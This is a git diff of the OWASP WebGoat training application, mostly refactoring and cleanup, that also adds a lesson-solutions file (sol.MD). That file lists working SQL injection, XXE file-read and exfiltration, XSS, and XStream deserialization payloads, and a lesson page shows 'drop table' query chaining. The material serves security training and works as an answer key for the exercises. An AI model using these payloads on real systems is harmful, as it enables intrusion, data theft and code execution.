--- a/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java
@ -0,0 +1,36 @@
+package org.owasp.webgoat.asciidoc;
+
+import org.asciidoctor.ast.AbstractBlock;
+import org.asciidoctor.extension.InlineMacroProcessor;
+import org.springframework.core.env.Environment;
+import org.springframework.util.StringUtils;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import java.util.Map;
+
+public class WebWolfMacro extends InlineMacroProcessor {
+
+    public WebWolfMacro(String macroName, Map<String, Object> config) {
+        super(macroName, config);
+    }
+
+    @Override
+    protected String process(AbstractBlock parent, String target, Map<String, Object> attributes) {
+        Environment env = EnvironmentExposure.getEnv();
+        String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+        return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
+    }
+
+    /**
+     * Look at the remote address from received from the browser first. This way it will also work if you run
+     * the browser in a Docker container and WebGoat on your local machine.
+     */
+    private String determineHost(String host, String port) {
+        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
+        String ip = request.getRemoteAddr();
+        String hostname = StringUtils.hasText(ip) ? ip : host;
+        return "http://" + hostname + ":" + port + "/WebWolf";
+    }
+}
--- a/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java
@ -55,7 +55,7 @@ public abstract class AssignmentEndpoint extends Endpoint {

 	//// TODO: 11/13/2016 events better fit?
    protected AttackResult trackProgress(AttackResult attackResult) {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        if (userTracker == null) {
            userTracker = new UserTracker(webSession.getUserName());
        }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java
@ -1,11 +1,9 @@
 package org.owasp.webgoat.lessons;

+import com.google.common.collect.Lists;
 import lombok.*;

-import javax.persistence.Entity;
-import javax.persistence.Id;
-import javax.persistence.OneToMany;
-import javax.persistence.Transient;
+import javax.persistence.*;
 import java.util.List;

 /**
@ -37,19 +35,30 @@ import java.util.List;
 * @version $Id: $Id
 * @since November 25, 2016
 */
-@AllArgsConstructor
-@RequiredArgsConstructor
-@NoArgsConstructor
@Getter
@EqualsAndHashCode
@Entity
 public class Assignment {
-    @NonNull
+
    @Id
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
    private String name;
-    @NonNull
    private String path;
    @Transient
    private List<String> hints;

+    private Assignment() {
+        //Hibernate
+    }
+
+    public Assignment(String name, String path) {
+        this(name, path, Lists.newArrayList());
+    }
+
+    public Assignment(String name, String path, List<String> hints) {
+        this.name = name;
+        this.path = path;
+        this.hints = hints;
+    }
 }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonMenuService.java
@ -73,7 +73,7 @@ public class LessonMenuService {
    List<LessonMenuItem> showLeftNav() {
        List<LessonMenuItem> menu = new ArrayList<>();
        List<Category> categories = course.getCategories();
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());

        for (Category category : categories) {
            LessonMenuItem categoryItem = new LessonMenuItem();
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/LessonProgressService.java
@ -40,7 +40,7 @@ public class LessonProgressService {
    @RequestMapping(value = "/service/lessonprogress.mvc", produces = "application/json")
    @ResponseBody
    public Map getLessonInfo() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        LessonTracker lessonTracker = userTracker.getLessonTracker(webSession.getCurrentLesson());
        Map json = Maps.newHashMap();
        String successMessage = "";
@ -63,7 +63,7 @@ public class LessonProgressService {
    @RequestMapping(value = "/service/lessonoverview.mvc", produces = "application/json")
    @ResponseBody
    public List<LessonOverview> lessonOverview() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        AbstractLesson currentLesson = webSession.getCurrentLesson();
        List<LessonOverview> result = Lists.newArrayList();
        if ( currentLesson != null ) {
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/ReportCardService.java
@ -64,7 +64,7 @@ public class ReportCardService {
    @GetMapping(path = "/service/reportcard.mvc", produces = "application/json")
    @ResponseBody
    public ReportCard reportCard() {
-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        List<AbstractLesson> lessons = course.getLessons();
        ReportCard reportCard = new ReportCard();
        reportCard.setTotalNumberOfLessons(course.getTotalOfLessons());
--- a/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/service/RestartLessonService.java
@ -59,7 +59,7 @@ public class RestartLessonService {
        AbstractLesson al = webSession.getCurrentLesson();
        log.debug("Restarting lesson: " + al);

-        UserTracker userTracker = userTrackerRepository.findOne(webSession.getUserName());
+        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
        userTracker.reset(al);
        userTrackerRepository.save(userTracker);
    }
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/LessonTracker.java
@ -47,13 +47,16 @@ import java.util.stream.Collectors;
 */
@Entity
 public class LessonTracker {
-    @Getter
+
    @Id
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
+    @Getter
    private String lessonName;
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
    private final Set<Assignment> solvedAssignments = Sets.newHashSet();
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private final List<Assignment> allAssignments = Lists.newArrayList();
+    private final Set<Assignment> allAssignments = Sets.newHashSet();
    @Getter
    private int numberOfAttempts = 0;

--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/Scoreboard.java
@ -38,7 +38,7 @@ public class Scoreboard {
        List<WebGoatUser> allUsers = userRepository.findAll();
        List<Ranking> rankings = Lists.newArrayList();
        for (WebGoatUser user : allUsers) {
-            UserTracker userTracker = userTrackerRepository.findOne(user.getUsername());
+            UserTracker userTracker = userTrackerRepository.findByUser(user.getUsername());
            rankings.add(new Ranking(user.getUsername(), challengesSolved(userTracker)));
        }
        return rankings;
--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java
@ -2,6 +2,7 @@
 package org.owasp.webgoat.users;

 import com.google.common.collect.Lists;
+import com.google.common.collect.Sets;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.lessons.Assignment;
@ -10,6 +11,7 @@ import javax.persistence.*;
 import java.util.List;
 import java.util.Map;
 import java.util.Optional;
+import java.util.Set;
 import java.util.stream.Collectors;


@ -48,9 +50,11 @@ import java.util.stream.Collectors;
 public class UserTracker {

    @Id
+    @GeneratedValue(strategy = GenerationType.AUTO)
+    private Long id;
    private String user;
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
-    private List<LessonTracker> lessonTrackers = Lists.newArrayList();
+    private Set<LessonTracker> lessonTrackers = Sets.newHashSet();

    private UserTracker() {}

--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/UserTrackerRepository.java
@ -8,5 +8,6 @@ import org.springframework.data.jpa.repository.JpaRepository;
 */
 public interface UserTrackerRepository extends JpaRepository<UserTracker, String> {

+    UserTracker findByUser(String user);

 }
--- a/webgoat-container/src/main/resources/application.properties
+++ b/webgoat-container/src/main/resources/application.properties
@ -3,6 +3,7 @@ server.error.path=/error.html
 server.session.timeout=600
 server.contextPath=/WebGoat
 server.port=8080
+server.address=127.0.0.1

 spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webgoat
 spring.jpa.hibernate.ddl-auto=update
@ -20,8 +21,8 @@ spring.resources.cache-period=0
 spring.thymeleaf.cache=false

 webgoat.clean=false
-webgoat.server.directory=${user.home}/.webgoat/
-webgoat.user.directory=${user.home}/.webgoat/
+webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
+webgoat.user.directory=${user.home}/.webgoat-${webgoat.build.version}/
 webgoat.build.version=@project.version@
 webgoat.build.number=@build.number@
 webgoat.email=webgoat@owasp.org
--- a/webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/controller/LessonController.js
@ -74,7 +74,7 @@ define(['jquery',

            this.loadLesson = function(name,pageNum) {
                if (this.name === name) {
-                    this.listenTo(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
+                    this.listenToOnce(this.lessonHintView, 'hints:showButton', this.onShowHintsButton);
                    this.listenTo(this.lessonHintView, 'hints:hideButton', this.onHideHintsButton);
                    this.lessonContentView.navToPage(pageNum);
                    this.lessonHintView.hideHints();
@ -102,12 +102,13 @@ define(['jquery',
                    hasSource:this.lessonInfoModel.get('hasSource')
                });

-                this.listenTo(this.helpControlsView,'hints:show',this.showHints);
+                this.listenTo(this.helpControlsView,'hints:show',this.showHintsView);

                this.listenTo(this.helpControlsView,'lesson:restart',this.restartLesson);
                this.listenTo(this.developerControlsView, 'dev:labels', this.restartLesson);

                this.helpControlsView.render();
+                this.showHintsView();
                this.titleView.render(this.lessonInfoModel.get('lessonTitle'));
            };

@ -180,8 +181,13 @@ define(['jquery',
 //                }
 //            };

-            this.showHints = function() {
+            this.showHintsView = function() {
                this.lessonHintView.render();
+                if (this.lessonHintView.getHintsCount > 0) {
+                    this.helpControlsView.showHintsButton();
+                } else {
+                    this.helpControlsView.hideHintsButton();
+                }
            };

            this.restartLesson = function() {
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/HintView.js
@ -126,6 +126,10 @@ function($,
 			} else {
 				this.$el.find('#show-prev-hint').css('visibility','visible');
 			}
+		},
+
+		getHintsCount: function () {
+		    return this.collection.length;
 		}

 	});
--- a/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/assignments/AssignmentEndpointTest.java
@ -62,7 +62,7 @@ public class AssignmentEndpointTest {

    public void init(AssignmentEndpoint a) {
        messages.setBasenames("classpath:/i18n/messages", "classpath:/i18n/WebGoatLabels");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        ReflectionTestUtils.setField(a, "userTrackerRepository", userTrackerRepository);
        ReflectionTestUtils.setField(a, "userSessionData", userSessionData);
        ReflectionTestUtils.setField(a, "webSession", webSession);
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
@ -63,7 +63,7 @@ public class LessonMenuServiceTest {
        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1, l2));
        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);

        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
                .andExpect(status().isOk())
@ -81,7 +81,7 @@ public class LessonMenuServiceTest {
        when(course.getLessons(any())).thenReturn(Lists.newArrayList(l1));
        when(course.getCategories()).thenReturn(Lists.newArrayList(Category.ACCESS_CONTROL));
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);


        mockMvc.perform(MockMvcRequestBuilders.get(URL_LESSONMENU_MVC))
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
@ -72,7 +72,7 @@ public class LessonProgressServiceTest {
    @Before
    public void setup() {
        Assignment assignment = new Assignment("test", "test");
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
        when(websession.getCurrentLesson()).thenReturn(lesson);
        when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
@ -53,7 +53,7 @@ public class ReportCardServiceTest {
        when(course.getTotalOfLessons()).thenReturn(1);
        when(course.getTotalOfAssignments()).thenReturn(10);
        when(course.getLessons()).thenReturn(Lists.newArrayList(lesson));
-        when(userTrackerRepository.findOne(anyString())).thenReturn(userTracker);
+        when(userTrackerRepository.findByUser(anyString())).thenReturn(userTracker);
        when(userTracker.getLessonTracker(any(AbstractLesson.class))).thenReturn(lessonTracker);
        mockMvc.perform(MockMvcRequestBuilders.get("/service/reportcard.mvc"))
                .andExpect(status().isOk())
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
+++ b/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
@ -62,7 +62,7 @@ public class UserTrackerRepositoryTest {

        userTrackerRepository.save(userTracker);

-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        Assertions.assertThat(userTracker.getLessonTracker("test")).isNotNull();
    }

@ -77,7 +77,7 @@ public class UserTrackerRepositoryTest {

        userTrackerRepository.saveAndFlush(userTracker);

-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        Assertions.assertThat(userTracker.numberOfAssignmentsSolved()).isEqualTo(1);
    }

@ -90,7 +90,7 @@ public class UserTrackerRepositoryTest {
        userTracker.assignmentFailed(lesson);
        userTrackerRepository.saveAndFlush(userTracker);

-        userTracker = userTrackerRepository.findOne("test");
+        userTracker = userTrackerRepository.findByUser("test");
        userTracker.assignmentFailed(lesson);
        userTracker.assignmentFailed(lesson);
        userTrackerRepository.saveAndFlush(userTracker);
--- a/webgoat-images/vagrant-developers/Vagrantfile
+++ b/webgoat-images/vagrant-developers/Vagrantfile
@ -1,32 +0,0 @@
-Vagrant.configure(2) do |config|
-  config.vm.box = "boxcutter/ubuntu1604-desktop"
-
-
-  config.vm.provider "virtualbox" do |vb|
-  	vb.gui = true
-  	vb.memory = "4096"
-  	vb.cpus = 2
-  	vb.name = "WebGoat-Development"
-	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
-  end
-
-  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
-
-  config.vm.provision 'shell' do |s|
-    s.path = '../vagrant_provision.sh'
-    s.privileged = true
-  end
-
-  config.vm.provision :shell, privileged:false, inline: <<-SHELL
-    echo -e "Cloning the WebGoat container repository"
-    git clone -b master https://github.com/WebGoat/WebGoat.git
-    echo -e "Cloning the WebGoat Lessons repository"
-    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
-    SHELL
-
-  config.vm.provision 'shell' do |s|
-    s.inline = "echo Finished provisioning, login with user vagrant pass vagrant"
-  end
-
-end
-
--- a/webgoat-images/vagrant-training/Vagrantfile
+++ b/webgoat-images/vagrant-training/Vagrantfile
@ -19,17 +19,17 @@ Vagrant.configure(2) do |config|
  end

  config.vm.provision "shell", inline: <<-SHELL
-    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M5/webgoat-server-8.0.0.M6.jar
-    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M5/webwolf-8.0.0.M6.jar
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webgoat-server-8.0.0.RELEASE.jar
+    wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.RELEASE/webwolf-8.0.0.RELEASE.jar
    sudo add-apt-repository ppa:openjdk-r/ppa
    sudo apt-get update
    sudo apt-get install openjdk-8-jre -y
    SHELL

  config.vm.provision "shell", run: "always", privileged: false, inline: <<-SHELL
-    java -jar webgoat-server-8.0.0.M6.jar &
+    java -jar webgoat-server-8.0.0.RELEASE.jar &
    sleep 40s
-    java -jar webwolf-8.0.0.M6.jar
+    java -jar webwolf-8.0.0.RELEASE.jar
    SHELL

 end
--- a/webgoat-images/vagrant-users/Vagrantfile
+++ b/webgoat-images/vagrant-users/Vagrantfile
@ -1,48 +0,0 @@
-#For now use the same as for developers but start WebGoat
-#In the future we can add Docker as well and then Vagrant can start the
-#Docker container or Chef which setups the Tomcat
-
-Vagrant.configure(2) do |config|
-  config.vm.box = "boxcutter/ubuntu1604-desktop"
-  config.vm.network :forwarded_port, guest: 8080, host: 9999
-  config.vm.provider "virtualbox" do |vb|
-  	vb.gui = false
-  	vb.memory = "2048"
-  	vb.cpus = 2
-  	vb.name = "WebGoat-Users"
-	vb.customize ["modifyvm", :id, "--nictype1", "virtio"]
-  end
-  config.vm.provider "vmware_fusion" do |vf|
-    vf.gui = false
-    vf.vmx["memsize"] = 4096
-    vf.vmx["numvcpus"] = 2
-    vf.vmx["displayname"] = "WebGoat-Users"
-  end
-
-  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"
-
-  config.vm.provision 'shell' do |s|
-    s.path = '../vagrant_provision.sh'
-    s.privileged = true
-  end
-
-  config.vm.provision :shell, inline: <<-SHELL
-    echo -e "Cloning the WebGoat container repository"
-    git clone -b master https://github.com/WebGoat/WebGoat.git
-    echo -e "Cloning the WebGoat Lessons repository"
-    git clone -b master https://github.com/WebGoat/WebGoat-Lessons.git
-    echo -e "Compiling and installing the WebGoat Container lesson server....."
-    mvn -q -DskipTests -file WebGoat/pom.xml clean compile install
-    echo -e "Compiling and installing the WebGoat Lessons $COL_RESET"
-    mvn -q -DskipTests -file WebGoat-Lessons/pom.xml package
-    echo -e "Copying the compiled lessons jars into the container so we can start the lesson server with some base lessons"
-    cp -fa ./WebGoat-Lessons/target/plugins/*.jar ./WebGoat/webgoat-container/src/main/webapp/plugin_lessons/
-    nohup mvn -q -DskipTests -file WebGoat/pom.xml -pl webgoat-container tomcat7:run-war 0<&- &>/dev/null &
-    SHELL
-
-  config.vm.provision 'shell' do |s|
-    s.inline = "echo Finished provisioning, open a browser and browse to http://localhost:9999/WebGoat/"
-  end
-
-end
-
--- a/webgoat-images/vagrant_provision.sh
+++ b/webgoat-images/vagrant_provision.sh
@ -1,62 +0,0 @@
-#!/usr/bin/env bash
-set -e
-
-echo "Setting locale..."
-sudo update-locale LC_ALL=en_US.UTF-8 LANG=en_US.UTF-8
-
-sudo kill -9 $(lsof -t /var/lib/dpkg/lock) || true
-sudo apt-get update
-sudo apt-get install -y git
-
-echo "Installing required packages..."
-sudo apt-get install -y -q build-essential autotools-dev automake pkg-config expect
-
-
-## Chrome
-wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
-sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
-sudo apt-get update
-sudo apt-get install -y google-chrome-stable
-
-## Java 8
-echo "Provisioning Java 8..."
-mkdir -p /home/vagrant/java
-cd /home/vagrant/java
-test -f /tmp/jdk-8-linux-x64.tar.gz || curl -q -L --cookie "oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u101-b13/jdk-8u101-linux-x64.tar.gz -o /tmp/jdk-8-linux-x64.tar.gz
-
-sudo mkdir -p /usr/lib/jvm
-sudo tar zxf /tmp/jdk-8-linux-x64.tar.gz -C /usr/lib/jvm
-
-sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_101/bin/java" 1
-sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_101/bin/javac" 1
-sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_101/bin/javaws" 1
-
-sudo chmod a+x /usr/bin/java
-sudo chmod a+x /usr/bin/javac
-sudo chmod a+x /usr/bin/javaws
-sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_101
-
-echo "export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_101" >> /home/vagrant/.bashrc
-
-## Maven
-echo "Installing Maven.."
-sudo apt-get install -y maven
-
-## ZAP
-echo "Provisioning ZAP..."
-cd /home/vagrant
-mkdir tools
-cd tools
-wget https://github.com/zaproxy/zaproxy/releases/download/2.5.0/ZAP_2.5.0_Linux.tar.gz
-tar xvfx ZAP_2.5.0_Linux.tar.gz
-rm -rf ZAP_2.5.0_Linux.tar.gz
-
-## IntelliJ
-cd /home/vagrant/tools
-wget https://download.jetbrains.com/idea/ideaIC-2016.1.4.tar.gz
-tar xvfz ideaIC-2016.1.4.tar.gz
-rm -rf ideaIC-2016.1.4.tar.gz
-
-## Eclipse
-sudo apt-get -y install eclipse
-
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
+++ b/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
@ -46,7 +46,6 @@ public class Flag extends Endpoint {
    @PostConstruct
    public void initFlags() {
        IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
-        FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
    }

    @Override
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
@ -64,7 +64,7 @@ public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
 		userSessionData.setValue("xss-reflected1-complete",(Object)"false");
 		StringBuffer cart = new StringBuffer();
 		cart.append("Thank you for shopping at WebGoat. <br />You're support is appreciated<hr />");
-		cart.append("<p>We have chaged credit card:" + field1 + "<br />");
+		cart.append("<p>We have charged credit card:" + field1 + "<br />");
 		cart.append(   "                             ------------------- <br />");
 		cart.append(   "                               $" + totalSale);

--- a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
+++ b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
@ -33,7 +33,7 @@ public class CSRFLogin extends AssignmentEndpoint {
    }

    private void markAssignmentSolvedWithRealUser(String username) {
-        UserTracker userTracker = userTrackerRepository.findOne(username);
+        UserTracker userTracker = userTrackerRepository.findByUser(username);
        userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
        userTrackerRepository.save(userTracker);
    }
--- a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
+++ b/webgoat-lessons/http-basics/src/main/resources/lessonPlans/en/HttpBasics_content1.adoc
@ -1,8 +1,8 @@

-Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP	request. 
-
-The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
+Enter your name in the input field below and press "Go!" to submit.	The server will accept the request, reverse the
+input and display it back to the user, illustrating the basics of handling an HTTP request.

 == Try It!

-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
+Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input
+and display it back to the user, illustrating the basics of handling an HTTP request.
--- a/webgoat-lessons/sol.MD
+++ b/webgoat-lessons/sol.MD
@ -0,0 +1,111 @@
+### SQLi ###  
+
+Basic  
+Smith - to show it returns smith's records.    
+To show exploit; `1=1` can be any true clause:  
+
+```sql  
+Smith' or '1'='1   
+```
+
+**Bender Login**  
+```sql
+bender@juice-sh.op' --  
+```
+```sql 
+[2:19 PM]  
+101
+101 or 1=1
+```  
+```sql 
+Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+```  
+
+## XXE ##
+
+Simple:  
+```xml 
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>  
+```
+
+Modern Rest Framework:  
+Change content type to: `Content-Type: application/xml` and 
+```xml  
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+```  
+
+Blind SendFile   
+```xml
+  
+      Solution:
+     
+      Create DTD:
+     
+      <pre>
+          <?xml version="1.0" encoding="UTF-8"?>
+          <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
+          <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
+           %all;
+      </pre>
+     
+      This will be reduced to:
+     
+      <pre>
+          <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
+      </pre>
+     
+      Wire it all up in the xml send to the server:
+     
+      <pre>
+       <?xml version="1.0"?>
+       <!DOCTYPE root [
+       <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
+       %remote;
+        ]>
+       <user>
+         <username>test&send;</username>
+       </user>
+     
+      </pre>
+     
+     
+```
+
+### XSS ###
+```javascript
+<script>alert('my javascript here')</script>4128 3214 0002 1999
+``` 
+
+DOM-XSS:  
+
+  Something like 
+  `http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+//`   
+OR  
+`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`  
+
+### Vuln - Components ###
+
+Jquery page: - it is contrived; but paste that in each box  
+```javascript
+OK<script>alert("XSS")<\/script>
+OK<script>alert("XSS")<\/script>
+```
+for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
+```html  
+<sorted-set>  
+ <string>foo</string>
+ <dynamic-proxy>
+   <interface>java.lang.Comparable</interface>
+   <handler class="java.beans.EventHandler">
+     <target class="java.lang.ProcessBuilder">
+       <command>
+         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
+       </command>
+     </target>
+     <action>start</action>
+   </handler>
+ </dynamic-proxy>
+</sorted-set>
+
+```
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
+++ b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc
@ -1,15 +1,29 @@
 == Special Characters

+[source]
+----
 /* */ 	 are inline comments
 -- , # 	 are line comments
-'Select * from users where name = ‘admin’--and pass = ‘pass’'

+Example: Select * from users where name = 'admin' --and pass = 'pass'
+----
+
+
+[source]
+----
 ;        allows query chaining
-'Select * from users; drop table users;'

-’,+,||	allows string concatenation 
+Example: Select * from users; drop table users;
+----
+
+[source]
+----
+',+,||	 allows string concatenation
 Char()	 strings without quotes
-'Select * from users where name = ‘+char(27) or 1=1'
+
+Example: Select * from users where name = '+char(27) or 1=1
+----
+

 ==  Special Statements

--- a/webgoat-lessons/webgoat-lesson-template/getting-started.MD
+++ b/webgoat-lessons/webgoat-lesson-template/getting-started.MD
@ -0,0 +1,70 @@
+### To include lesson template in build ###
+1. Edit the webgoat-server/pom.xml file and uncomment the section under  
+  ```xml  
+   <!--uncommment below to run/include lesson template in WebGoat Build-->  
+  ```
+
+2. Also uncomment in webgoat-lessons/pom.xml where it says    
+  ```xml  
+   <!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
+  ```  
+  
+### To add a lesson to WebGoat ###
+
+There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
+
+0. The POM file  
+
+    *  Change the line to give your lesson its own artifactId.   
+        That should be all you need to do there:  
+	```xml  
+	 <artifactId>webgoat-lesson-template</artifactId>  
+	```  
+1. The Base Class  
+
+    *  The name of the class (file and class name) to better match your lesson. (e.g. `sql-injection` >> `SqlInjection`)  
+    *  The category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added.  
